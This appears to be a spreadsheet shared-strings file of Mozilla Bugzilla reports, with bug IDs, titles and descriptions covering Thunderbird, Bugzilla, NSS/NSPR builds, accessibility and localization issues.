    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 Avant Browser Avant Browser .NET CLR 1.0.3705)
Build Identifier: Internet Explorer 7.0
Display of 'Bugs Detected' column in the Expand All functionality is Test
Runs will confuse the end user.
Steps to repeat the problem:
1. Go to http://bugz.deanza.edu/bugzilla_testopia/
2. Enter your Login &amp; Password and click on the Login button.
3. Click on Find Test Runs
4. UnSelect all the highlihted files in the listboxes
5. Click Submit
6. In the search results Select any Test Run and click on the button 'Expand
All'
7. There is a facility to attach a bug to each test case.
8. If the user attached more than one bug to any test case all the bug numbers
are getting displayed in the Chronologic i.e. sequencial order
9. The display of this bug numbers may cause some confusion to the end user as
there is NO delimiter i.e. comma or space etc between the bug numbers
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>vpushpalatha</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-529437</t>
  </si>
  <si>
    <t>[AMO] Push local patch to addons.mozilla.org</t>
  </si>
  <si>
    <t>We need two patches applied to production AMO so fligtar can send out an email to developers. It's a total of 3 changed lines and has been QA'd.
https://bug529325.bugzilla.mozilla.org/attachment.cgi?id=412889
https://bug529177.bugzilla.mozilla.org/attachment.cgi?id=412974</t>
  </si>
  <si>
    <t>BUGZILLA-427477</t>
  </si>
  <si>
    <t>Add foreign key constraints for series table and series_data table</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.10) Gecko/20070510 Fedora/1.5.0.10-6.fc6 Firefox/1.5.0.10
Build Identifier: 
Add foreign key information for series table and seris_data table in Bugzilla/DB/Schema.pm file.
Reproducible: Always</t>
  </si>
  <si>
    <t>THUNDERBIRD-243810</t>
  </si>
  <si>
    <t>unable to read new mail when viewing inbox</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a) Gecko/20040512 Firefox/0.8.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a) Gecko/20040512 Firefox/0.8.0+
When viewing the Inbox of a POP3 account if new mail arrives I am unable to
view that new mail.  I can read previously collected email but viewing the
newly received email only displays the currently viewed email. Cannot manage new
email at all (delete read mark as junk etc.).
This behaviour does not occur if viewing a different sub-folder when new mail
arrives.
Changing from Inbox to a different subfolder then back to Inbox does not correc
tthe iussue.
Restarting Thunderbird allows me to view the affected messages but behaviour
recurrs for new messages.
Issue does not occur in build 20040502 and prior.  
Reproducible: Always
Steps to Reproduce:
1.  View a message in Inbox
2.  Receive new email
3.
Actual Results:  
Unable to view new email.
Expected Results:  
Allowed me to view new email.</t>
  </si>
  <si>
    <t>CORE-331689</t>
  </si>
  <si>
    <t>Templates generated from RDF contains DOM attributes for properties that don't exist.</t>
  </si>
  <si>
    <t>This may be an XBL or an RDF problem... not sure but I believe it is XBL.
On initial construction the elements have DOM attributes for properties with a value of an empty string even when they don't exist in the RDF. If the property is asserted with a value and then unasserted there is no longer a DOM attribute for this property. When handling whether the value exists or not this makes it so that both existence and an empty string have to be checked. Also if an empty string is asserted the attribute isn't added to the DOM though it is added to the RDF.
I will attach a testcase in the form of a Firefox extension shortly.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-438885</t>
  </si>
  <si>
    <t>Need additional SVN checkin permissions for projects/mozilla.com</t>
  </si>
  <si>
    <t>In addition to bug 437089 for spreadfirefox.com I also now need SVN checkin rights for:
http://svn.mozilla.org/projects/mozilla.com/
CC'ing morgamic for approval mojo</t>
  </si>
  <si>
    <t>CORE-380975</t>
  </si>
  <si>
    <t>Branch null-ptr crashes in nsAccessibleHyperText (Linux only) [@ nsAccessibleHyperText::GetCaretOffset]</t>
  </si>
  <si>
    <t>Spawned off from bug 376924 comment 32 - the Standalone testcase
attachment 261377 crashes on branches also with the patch in bug 376924.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-505772</t>
  </si>
  <si>
    <t>Make get_bloat_log and compare bloat logs warn instead of fail in leak builds</t>
  </si>
  <si>
    <t>CORE-513373</t>
  </si>
  <si>
    <t>TM: Inline GetUnitString fast path</t>
  </si>
  <si>
    <t>5% speedup for string-base64</t>
  </si>
  <si>
    <t>CORE-502270</t>
  </si>
  <si>
    <t>image redecoding should be progressive</t>
  </si>
  <si>
    <t>Before we land bug 435296 (decode-on-draw) we should be able to progressively redecode images (displaying the decoded image as we go instead of locking up the main thread while we decode the image).
Bobby I made this as a separate bug because I think it should be a separate patch (probably with layout changes etc) though I think we definitely want to land both of these at once.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-406613</t>
  </si>
  <si>
    <t>add staging and production bootstrap configs to cvs</t>
  </si>
  <si>
    <t>Attachment to come..</t>
  </si>
  <si>
    <t>CORE-379701</t>
  </si>
  <si>
    <t>JavaScript Tests - replace JavaScriptOptions</t>
  </si>
  <si>
    <t>Created attachment 263709
patch
I previously introduced a user defined object JavaScriptOptions which was used to set various javascript.options.* in both the browser and shell. 
The syntax however differs from the normal shell syntax requires explicit resetting etc. 
This bug is about replacing the JavaScriptOptions code so that the syntax of using options() options('strict') etc in the shell can be used without modification in individual test cases in both the browser and shell.
Igor would you mind stamping this with a + if it seems ok to you?</t>
  </si>
  <si>
    <t>MOZILLA.ORG-379596</t>
  </si>
  <si>
    <t>stage access for Daniel Boelzle</t>
  </si>
  <si>
    <t>I would like to have stage access for calendar to be able to upload releases Solaris contribs I am marked as owner of the calendar module in despot.
My public ssh key is attached to bug 332236 (https://bugzilla.mozilla.org/attachment.cgi?id=216823).</t>
  </si>
  <si>
    <t>TOOLKIT-304188</t>
  </si>
  <si>
    <t>find-menu appears in editor element which has had makeEditable() called but designMode not set.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
When creating a XUL application with an  embedded the editor pane will
bring up a Find-menu when the apostrophe or slash keys are pressed even though
the user is currently having a caret and is able to edit the document on the page.
This only happens when editor.makeEditable() has been called but the content
document's designMode property has NOT been set to on.
Reproducible: Always
Steps to Reproduce:
1. create XUL document with  embedded
2. set onload for document to: document.getElementById('myEditor').makeEditable()
3. load page and type text then type apostrophe (') and/or slash (/).
Actual Results:  
Find menu pops up at bottom.
Expected Results:  
Uninterrupted editing.
Setting designMode to on will solve the issue.</t>
  </si>
  <si>
    <t>kalle</t>
  </si>
  <si>
    <t>CORE-487005</t>
  </si>
  <si>
    <t>Assertion failure: JS_PROPERTY_CACHE(cx).disabled == fp-&gt;pcDisabledSave on ebay search</t>
  </si>
  <si>
    <t>http://search.ebay.com/search/search.dll?from=R40&amp;_trksid=p3907.m37.l1313&amp;satitle=ps2&amp;category0=
Assertion failure: JS_PROPERTY_CACHE(cx).disabled == fp-&gt;pcDisabledSave at /Users/jruderman/tracemonkey/js/src/jsinterp.cpp:3063
TM branch</t>
  </si>
  <si>
    <t>MOZILLA.ORG-501240</t>
  </si>
  <si>
    <t>svn access to http://svn.mozilla.org/projects/openweb/ for dalmaer</t>
  </si>
  <si>
    <t>I should have put this in bug 501233 as well :)
v=laura</t>
  </si>
  <si>
    <t>CORE-62996</t>
  </si>
  <si>
    <t>Linux speculative RTTI heuristics break in gcc-2.95.2</t>
  </si>
  <si>
    <t>Urgh. Although the vtable layout is the same the code generated for the RTTI 
stub has changed between egcs-1.1.2 and gcc-2.95.2. I spent half an hour trying 
to figure out how to update the heuristics but the function prologue is now...
  push %ebp
  mov  %esp%ebp
  sub  $esp
I've seen values of $0x8 and $0x14 as the constant there may be others. (I'm 
not sure why it'd change...multiple inheritance?)
Anyway filtering on this prologue is too weak: we end up calling a *lot* of 
routines wreaking havoc along the way and eventually aborting when we trollop 
through some static NSPR callback.
Need to fix this when we upgrade...</t>
  </si>
  <si>
    <t>BUGZILLA-367480</t>
  </si>
  <si>
    <t>[LDAP] Try a list of servers in order until we connect successfully</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-GB rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Build Identifier: 2.23.3+
If the LDAP server used for Bugzilla authentication is down authentication fails. Bugzilla should be able to failover to another server.
Reproducible: Always</t>
  </si>
  <si>
    <t>firefox</t>
  </si>
  <si>
    <t>SERVO_GRAVEYARD-566410</t>
  </si>
  <si>
    <t>Rust</t>
  </si>
  <si>
    <t>SERVO_GRAVEYARD</t>
  </si>
  <si>
    <t>derived type descriptors</t>
  </si>
  <si>
    <t>Currently we can write a type-parametric function but not one which instantiates a local type derived from a type parameter and passes it into a sub-function. We need to support this.</t>
  </si>
  <si>
    <t>CORE-100676</t>
  </si>
  <si>
    <t>xpcom depends on uconv for platform charset info</t>
  </si>
  <si>
    <t>yuck.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-938934</t>
  </si>
  <si>
    <t>[B2G][1.2][l10n][Contacts]Romanian: Facebook Friends header bar truncated within Contacts App</t>
  </si>
  <si>
    <t>Created attachment 832656
TruncationRomanianFacebookFriends
When user accesses Settings area within Contact App to sync Facebook friends once friends are found to import the page's header of Facebook Friends is truncated in Romanian
Repro Steps: 
1) Updated Buri to Mozilla BuildID: 20131114004004 
2) Select Romanian language in Settings
3) Reboot device 
4) Tap Contacts App 
5) Tap gear icon in upper right of screen
6) Tap button to sync with Facebook friends
7) Log into Facebook account
Actual: 
The words 'Facebook Friendsâ€ appear truncated in Romanian
Expected: 
The words 'Facebook Friendsâ€ does not appear truncated in Romanian
Environmental Variables: 
Device: Buri v1.2 Mozilla RIL 
BuildID: 20131114004004 
Gaia: 3e67ddf7d2680d1ef01441641f4ca2e0e4006887 
Gecko: 948e30162eac 
Version: 26.0 
Notes: 
Repro frequency: 100% 
See attached: screenshot</t>
  </si>
  <si>
    <t>mclemmons</t>
  </si>
  <si>
    <t>CORE-96480</t>
  </si>
  <si>
    <t>we're sometimes submitting the wrong thing to bugzilla</t>
  </si>
  <si>
    <t>Twice using today's build I've seen changes that I submitted to bugzilla
giving me very strange results as if we were reloading a cached submission
rather than submitting the new one.  In the second case I saw a report of a
midair collision on a bug I commented on a few hours before after filling in my
username and password since I wasn't logged in on the show_bug.cgi page.  (I was
commenting on bug 96413 -- I saw the midair collision report for bug 96367.)
Akkana mentioned similar problems on IRC. (all times EDT = GMT-0400):
[13:19:11]  Wow.  I just added a comment (with today's build) to bug 96133
and apparently what it actually did was make 96094 a dup of 88458!
[13:20:03]  akk: that's a cool build. Let's shove 0.9.4 out the door
[13:20:05]  No that's just what it said it did.  Actually it didn't do
anything.
[13:20:15]  Just lost my comment completely.
[13:20:33]  cache problem?
[13:22:09]  dbaron: Yep there's a cache problem.  On the second try it
did submit the comment but I can't see it unless I shift-reload</t>
  </si>
  <si>
    <t>NSS-202053</t>
  </si>
  <si>
    <t>signing of softokn3.dll may fail on OS/2</t>
  </si>
  <si>
    <t>The mozilla\security\nss\cmd\cmd\shlibsign\Makefile suffers from several
problems. As is I cannot execute it under my current build environment with
VACPP and gmake 3.79.2a1 .
Here is the output I get :
[d:\nss\38\mozilla\security\nss\cmd\shlibsign]make
cd mangle gmake.exe export
gmake.exe[1]: Entering directory `D:/nss/38/mozilla/security/nss/cmd/shlibsign/m
angle'
gmake.exe[1]: Nothing to be done for `export'.
gmake.exe[1]: Leaving directory `D:/nss/38/mozilla/security/nss/cmd/shlibsign/ma
ngle'
nsinstall              -R -m 775 OS22.45_icc_DBG.OBJ/shlibsign.exe ../../../../d
ist/OS22.45_icc_DBG.OBJ/bin
cd mangle gmake.exe libs
gmake.exe[1]: Entering directory `D:/nss/38/mozilla/security/nss/cmd/shlibsign/m
angle'
nsinstall              -R -m 775 OS22.45_icc_DBG.OBJ/mangle.exe ../../../../../d
ist/OS22.45_icc_DBG.OBJ/bin
gmake.exe[1]: Leaving directory `D:/nss/38/mozilla/security/nss/cmd/shlibsign/ma
ngle'
exec sign.cmd ../../../../dist/OS22.45_icc_DBG.OBJ OS22.45_icc_DBG.OBJ OS2 ../..
/../../dist/OS22.45_icc_DBG.OBJ/lib/softokn3.dll
Unknown command d:
MAKE.EXE: [../../../../dist/OS22.45_icc_DBG.OBJ/lib/softokn3.chk] Error 2 (ignor
ed)
[d:\nss\38\mozilla\security\nss\cmd\shlibsign]
There are two problems :
1. The failure should not be ignored . Not having softokn3.chk generated means
that NSS applications such as Mozilla will not be able to enable FIPS mode a
feature wanted by the government. The fix for this is to remove the - from the
rule which causes the error to be ignored .
2. The signing script sign.cmd did not execute . It appears that because I'm
running under the 4OS2 shell the result is 'Unknown command d:' on my system
. This is the first time I run into any build problem related to 4OS2. I have a
fix which works regardless of the shell the user is in which is to invoke the
default OS/2 command interpreter cmd.exe directly to run the script.
I have attached a suggested patch to resolve these two problems which works fine
on my system. Please review and test it.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-251492</t>
  </si>
  <si>
    <t>[gnome]selected item text wrong color in high-contrast themes</t>
  </si>
  <si>
    <t>Use Mozilla Classic theme with gnome high-contrast theme
Try profile-manager's list or Prefs left tree
select one item and click somewhere to lose focus.
Now you can't tell which item is selected.</t>
  </si>
  <si>
    <t>NSPR-64217</t>
  </si>
  <si>
    <t>make fails when date string contains '</t>
  </si>
  <si>
    <t>I use a hebrew (he_IL) glibc locale. the date string of this locale contains one
' character.
on nsprpub/pr/src/ I get the following error:
/bin/sh: -c: line 1: unexpected EOF while looking for matching `'
/bin/sh: -c: line 2: syntax error: unexpected end of file
when trying to build the target 
Linux2.2.17pre6_x86_PTH_OPT.OBJ/_pr_bld.h
in the Makefile I see:
$(TINC):
	@$(MAKE_OBJDIR)
	@$(ECHO) '#define _BUILD_STRING $(SH_DATE)' &gt; $(TINC)
(etc.)
indeed bash does not accept the syntax:
echo 'foo 'bar'
A workaround:
run make with a different date format. e.g. (on bash):
LC_TIME=C make
To reproduce: 
have the 'date' command contain exactly one ' character.
e.g.: replace /bin/date with a script that returns `date.orig|sed -e s/.$/\'/`
or simply use the he_IL (iw_IL or he on some systems) locale if it is installed
on your system.</t>
  </si>
  <si>
    <t>tzafrir</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-375624</t>
  </si>
  <si>
    <t>Random Extension for the Sandbox Doesn't do a check if the extension was/is deleted</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Build Identifier: 
In the sandbox the we recommend/random extension section doesn't do a check if the extension is not available. Thus displaying the image attached. This applies only to the homepage of the sandbox
Reproducible: Sometimes
Steps to Reproduce:
1.Login
2.Go to sandbox
3.If lucky you will see this problem if not you will have to try again
Actual Results:  
Most of the time it displays a good extension but occasionally a deleted one will appear.
Expected Results:  
Shown all non-deleted extensions</t>
  </si>
  <si>
    <t>allyourbasearebelongtous.com</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-226428</t>
  </si>
  <si>
    <t>chromatek.com - HTML sent as text/plain</t>
  </si>
  <si>
    <t>wrong MIME type
contact: c3d@3dglassesonline.com and/or c3d@chromatek.com
sent e-mail on 11/20/03 awaiting reply</t>
  </si>
  <si>
    <t>TOOLKIT-445049</t>
  </si>
  <si>
    <t>Preference value types are not validated (or converted) before being set</t>
  </si>
  <si>
    <t>If you have a preference of type int it allows you to set the value to the string for example if it is on a radiogroup radio buttons only take string values so selecting a radio button will set the preference value to a string rather than int.
I can see this being a problem on radiogroups and menulists but not sure if on anything else.
This probably also affects preferences of different types (bool perhaps) and should look at converting the aValue to the correct type for those ones.</t>
  </si>
  <si>
    <t>CORE-105346</t>
  </si>
  <si>
    <t>eyesonff.com - [MARGIN-C] display problem with title bar's</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win95 en-US rv:0.9.5) Gecko/20011011
BuildID:    2001101117
Top title bar http://www.eyesonff.com/images/main.jpg which is located on the
main page of http://www.eyesonff.com/ should be raised all the way to the top
and not be lowered as is.
Error: unterminated string literal
Source File: http://www.eyesonff.com/
Line: 63 Column: 131
Source Code:
var cDoc=documentif(cDoc.domain.indexOf(siteDomain)==-1) siteDomain=''if
(siteDomain.length&gt;0) siteDomain='domain=.+siteDomain+
Website has tons of Unterminated string lateral's. I have tested the problem in
other browsers and have had no problem with the exception of the Mozilla which
in even Netscape display's the title bar wrong.
Reproducible: Couldn't Reproduce</t>
  </si>
  <si>
    <t>CORE-352049</t>
  </si>
  <si>
    <t>Kill the font download dialog</t>
  </si>
  <si>
    <t>Since the dialog is annoying not very useful on NT-based Windows variants (only asks users to go to the control panel) and doesn't with thebes (HaveFontFor always returns true and the code probably never calls the font package service anyway) it should be killed.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-338034</t>
  </si>
  <si>
    <t>Community sections need to be updated to include pimpmycamino</t>
  </si>
  <si>
    <t>the sections for blogs.cb.o got updated to 
News
Forum
Contributors' Blogs
PimpMyCamino
Promotion
but cb.o/community/ and cb.o/community/promotion/ both still have
News
Promotion
Forum
Contributors' Blogs</t>
  </si>
  <si>
    <t>CORE-204962</t>
  </si>
  <si>
    <t>PLEvent should lazily allocate lock and cvar</t>
  </si>
  <si>
    <t>PLEvent should lazily allocate lock and cvar.  The lock and cvar allocated in
PL_InitEvent is only ever used by PL_PostSynchronousEvent.  Since so many of our
events in mozilla are asynchronous this means we needlessly allocate locks and
cvars a bunch.  cathleen has (or had) some spacetrace data indicating a large
number of allocations resulting from this.</t>
  </si>
  <si>
    <t>CALENDAR-458828</t>
  </si>
  <si>
    <t>Many errors when setting up zimbra calendar</t>
  </si>
  <si>
    <t>I just built lightning &amp; tb from trunk.
I setup my zimbra caldav calendar.
1) it asked me for my credentials twice.  AFAIK i entered them correctly the first time but I don't know that for a fact.  Having a real error message if they were incorrect would be good.
2) I got 30 reminders for past events (somehow we should not bring up reminders on first load of calendar ISTM).  I hit the dismiss all button and got:
 Warning: There has been an error reading data for calendar: Zimbra.  However this error is believed to be minor so the program will attempt to continue. Error code: DAV_PUT_ERROR. Description: There was an error storing the item on the server.
on console (30 times) and an error dialog whose details button doesn't properly expand the dialog.  
I'm happy to provide more data if that helps figure out the errors.</t>
  </si>
  <si>
    <t>CORE-47791</t>
  </si>
  <si>
    <t>crash on shutdown releasing root in dead JS runtime</t>
  </si>
  <si>
    <t>We crash on shutdown now because the XUL prototype cache outlives the 
nsJSRuntimeService. When the prototype cache frees its prototype docs these 
try to unroot their JS objects in a runtime that's been destroyed.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-396986</t>
  </si>
  <si>
    <t>change apache document root in talos test boxes.</t>
  </si>
  <si>
    <t>The current talos boxes (the mini farm - not the blades) are configured to have a copy of talos found in an appropriate buildbot directory along with a separate copy of talos/page_load_test found in the buildbot user root directory.  
If the document root of apache is changed to point to the copy of page_load_test within the checked out copy of talos we can eliminate the secondary page_load_test directory and save ourselves a lot of headaches for auto-updating talos.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-383396</t>
  </si>
  <si>
    <t>web-based protocol handler backend code doesn't work with clicked links</t>
  </si>
  <si>
    <t>Created attachment 267359
always check more than just the OS apps v1
It currently only works with stuff on the URL bar.  The problem was that we were only checking whether the OS had a particular handler not whether the OS or the web had one.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-363600</t>
  </si>
  <si>
    <t>Periodically auto-save window state for crash recovery</t>
  </si>
  <si>
    <t>I'm splitting this out from bug 358689 leaving that one for adding UI to let users avoid crash loops. This is the portion that actually does the periodic auto-saving which we can go ahead with now since it's a hidden pref so the people turning it on can know to go nuke the file if they get into a bad state.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-381863</t>
  </si>
  <si>
    <t>Create a Litmus install FAQ</t>
  </si>
  <si>
    <t>We've started handling install help requests from a variety of groups that want to install Litmus for their own use. For questions that don't map to broken code we should capture this information in a user-editable format (wiki/QMO) so we can have something to point users to for common install problems.</t>
  </si>
  <si>
    <t>CORE-83536</t>
  </si>
  <si>
    <t>Merge 3 nsIPrincipal implementations into one</t>
  </si>
  <si>
    <t>Currently we have several implementation types for nsIPrincipal
nsCodebasePrincipal nsCertificatePrincipal nsAggreagtePrincipal (which groups
a codebase with a certificate) and nsSystemPrincipal all of which inherit from
nsBasePrincipal. Merging the first three types into a single implementation
class has several advantages:
1) Clarity/ease of use: Currently to see the URL associated with a principal
callers have to get an nsIPrincipal and QI it to an nsICodebasePrincipal.
Merging these types saves a QI and makes call sites simpler.
2) Performance: All principals associated with documents are
AggregatePrincipals which means that almost every function call on those
objects results in two virtual function calls: one to the AggregatePrincipal
and one to the underlying CodebasePrincipal. Eliminating the indirection would
speed things up a bit.
The indirection provided by AggregatePrincipals is necessary for pages that set
document.domain since this changes the document's principal and the change
must be reflected both in the document's principal and the principal of any
event handlers compiled for that page. I think we can solve this by adding a
setDomain function to the principal itself.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-423720</t>
  </si>
  <si>
    <t>Please update ebay_extension.html to point at the latest version of the ebay companion</t>
  </si>
  <si>
    <t>Howdy folks
eBay pushed new versions of the Companion extension today and I missed submitting the request to modify https://addons.mozilla.org/ebay/ebay-extension/ebay_extension.html with an updated URL and hash. As a result the download pages from mozilla.com aren't working properly as the file is hard-coded for http://releases.mozilla.org/pub/mozilla.org/addons/520
2/firefox_companion_for_ebay-1.1.1-fx-win.xpi which has been superceded so doesn't exist.
Could you please update to point to the new URL which is:
http://releases.mozilla.org/pub/mozilla.org/addons/5202/firefox_companion_for_ebay-1.5-fx-win.xpi
The hash also needs to be updated which is reported from AMO as:
sha1:0bf5b309dd9bf56b583576bdd22364f5cc97a063
Many thanks
kev</t>
  </si>
  <si>
    <t>CORE-451376</t>
  </si>
  <si>
    <t>IAccessibleText::attributes provides incorrect info after a mis-spelled word</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1a2pre) Gecko/20080819034536 Minefield/3.1a2pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1a2pre) Gecko/20080819034536 Minefield/3.1a2pre ID:20080819034536
IAccessibleText::attributes returns the attribute run representing a mis-spelled word if you give it an offset which is the offset after that attribute run. i.e. its the endOffset of the attribute run.
Reproducible: Always
Steps to Reproduce:
1. In a new thunderbird message type This iss a test.
2. call IAccessibleText::attributes for that node of text giving it an offset of 0 to get the This  attribute run.
3. Give it an offset of 5 to get the iss  attribute run [the mis-spelling] 
4. Give it an offset of 8 the start of the final attribute run [after the mis-spelling].
5. Give it an offset of 9.
Actual Results:  
*Giving 0 gives back startOffset: 0 endOffset: 5 and the appropriate attributes.
*Giving 5 gives back startOffset: 5 endOffset:8 and the attributes for that run.
*Giving 8 gives back StartOffset: 5 endOffset: 8 and attributes for that run.
*Giving 9 gives back startOffset: 8 endOffset: 15 and the attributes for that run.
Expected Results:  
*Giving 8 should give back startOffset: 8 endOffset: 15.
It seems that this bug is only related to the attribute runs of mis-spellings. The tests I have done seem to show that other attribute runs for bold italic etc do not cause this problem. 
This issue is very important as it can cause any AT using IAccessibleText::attributes to possibly go in to an infinite loop as the relationship between the given offset and the resulting start and end offsets is not correct.</t>
  </si>
  <si>
    <t>mick</t>
  </si>
  <si>
    <t>TOOLKIT-250889</t>
  </si>
  <si>
    <t>Find Toolbar: Spacebar/key problems when Use Find As You Type is enabled</t>
  </si>
  <si>
    <t>When Use Find As You Type is enabled and the Find Toolbar is *not* currently
shown pressing the Spacebar activates the find bar *and* scrolls the page. The
key press should just scroll the page.
When Use Find As You Type is enabled and the Find Toolbar is being shown
pressing the Spacebar adds a space character to the find bar *and* scrolls the
page. The key press should just add a space character.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-121505</t>
  </si>
  <si>
    <t>Store JSDScripts in a hash instead of a PRCList</t>
  </si>
  <si>
    <t>This should give us a snappier single step more.</t>
  </si>
  <si>
    <t>CORE-286897</t>
  </si>
  <si>
    <t>XBM cursor hotspots</t>
  </si>
  <si>
    <t>Now that bug 38447 is fixed hotspot data from XBM cursors should be read.  I
will upload the patch as soon as bug 38447 comment 163 is resolved.</t>
  </si>
  <si>
    <t>CORE-465371</t>
  </si>
  <si>
    <t>Native JSON stringification aborts on functions and xml but returns JS_TRUE</t>
  </si>
  <si>
    <t>Created attachment 348590
Patch v1
Native JSON stringification aborts on functions and xml but returns JS_TRUE. Patch attached.</t>
  </si>
  <si>
    <t>CORE-151139</t>
  </si>
  <si>
    <t>support nsIAccessibleValue in MAI (Mozilla Atk Implementation)</t>
  </si>
  <si>
    <t>silvia.zhao</t>
  </si>
  <si>
    <t>CORE-495307</t>
  </si>
  <si>
    <t>JavaScript Tests - update slow-n-*.tests</t>
  </si>
  <si>
    <t>slow-n.tests and slow-n-{1.8.11.9.01.9.11.9.2}.tests are used to track slow tests which developers can ignore in order to run the js test suite relatively quickly. This patch updates these files from current test results to exclude tests which require more than 60 seconds on typical machines. 
The existing slow files have been updated to only include slow shell tests. slow-n-{1.8.11.9.01.9.11.9.2}-browser.tests are used to track the browser slow tests.
Note: slow-n.tests should be considered to be deprecated. slow-n.tests now is composed of the union of the 1.9.0 and later branch specific files and ignores the 1.8.1 branch slow tests.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-516830</t>
  </si>
  <si>
    <t>Laptop has a cracked screen</t>
  </si>
  <si>
    <t>My laptop (MacBook Pro 15 in) has a cracked screen.</t>
  </si>
  <si>
    <t>cab</t>
  </si>
  <si>
    <t>CORE-403559</t>
  </si>
  <si>
    <t>ASSERTION: something is probably wrong somewhere with very stretchy  parentheses</t>
  </si>
  <si>
    <t>Created attachment 288411
testcase
Loading the testcase triggers:
###!!! ASSERTION: something is probably wrong somewhere: '1000 != count' file /Users/jruderman/trunk/mozilla/layout/mathml/base/src/nsMathMLChar.cpp line 2410</t>
  </si>
  <si>
    <t>CORE-504947</t>
  </si>
  <si>
    <t>Some Virus Scans report Trojan horse in 485217.xsl</t>
  </si>
  <si>
    <t>I've had a lot of trouble with hg clone in trying to get mozilla-1.9.1 mozilla-central code checked out.  Norton and Symantec antivirus products claim 485217.xsl is a Trojan horse.
I don't necessarily agree with that assessment nor do I agree this is Mozilla's bug.  I'm filing it anyway as UNCO for tracking.  Please feel free to reassign investigate fix or mark INVALID as you see fit.</t>
  </si>
  <si>
    <t>BUGZILLA-42809</t>
  </si>
  <si>
    <t>bug_email.pl doesn't allow for priority = 0</t>
  </si>
  <si>
    <t>-I have changed my priorities to 0..3 in my bugzilla setup.
-bug_email.pl doesn't handle a priority of 0 (will default to default priority)
-bug_email.pl is from the mozilla CVS
Problem:
in the CheckPriority routine L288 is :
&lt;&lt;&lt;&lt;&lt;&lt;&lt;my $prio = ($Control{'priority'} ||= )
as you can see if our priority that was read in was zero it get's zapped
changing L288 to:
&gt;&gt;&gt;&gt;&gt;&gt;&gt;my $prio = $Control{'priority'}
will solve this problem along with 
&lt;&lt;&lt;&lt;&lt;&lt;&lt;if( (lsearch( \@all_prios $prio ) == -1) || $prio eq  ) {
changing L291 to:
&gt;&gt;&gt;&gt;&gt;&gt;&gt;if( $prio eq  || (lsearch( \@all_prios $prio ) == -1)  ) {
to accomplish the same level of safety as before... :)
I'll attach my diff..
/Brad
I'll attach my diff.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-264363</t>
  </si>
  <si>
    <t>Translation of Effective Key Size</t>
  </si>
  <si>
    <t>Effective Key Size ist im deutschen moz mit Effektive SchlÃ¼sselgrÃ¶ÃŸe
Ã¼bersetzt. Die deutsche gebrÃ¤uchliche Bezeichnung ist aber Effektive
SchlÃ¼ssellÃ¤nge. Zumindest wird SchlÃ¼ssellÃ¤nge in allen Krypto-BÃ¼chern verwendet.
Genauso heiÃŸt es ja auch Wie lange ist dein Passwort? und nicht Wie groÃŸ ist
dein Passwort? usw.
Ach ja wo?
Bearbeiten -&gt; Einstellungen -&gt; Datenschutz &amp; Sicherheit -&gt; SSL -&gt; Codierung
einstellen -&gt; Details -&gt; Vierte Zeile
bzw. heiÃŸt die ENTITY cipher.keySize in der pref-ssl.dtd</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-479736</t>
  </si>
  <si>
    <t>Need a command to figure out quota space left or space used</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6
Build Identifier: 0.1.2
When using import it's easy to get a 'Unable to import maybe due to: Over quota'. To help with this you should be able to get your current quota how much quota is left and how much you currently have.
Reproducible: Always</t>
  </si>
  <si>
    <t>kassah</t>
  </si>
  <si>
    <t>FIREFOX-408470</t>
  </si>
  <si>
    <t>Page Style (e.g. No Style) does not persist across sessions</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9b2pre) Gecko/2007121321 Minefield/3.0b3pre
Page style does not persist across sessions. 
STR:
1. Go to any web page with CSS
2. Change the View &gt; Page Style to No Style
3. Restart your browser
Actual result:
The web page is restored but with all the CSS and not with the style you set.
Expected result:
The web page should be restored with No Style on still</t>
  </si>
  <si>
    <t>CALENDAR-229708</t>
  </si>
  <si>
    <t>select more than one task and change priority or progress should affect all selected items</t>
  </si>
  <si>
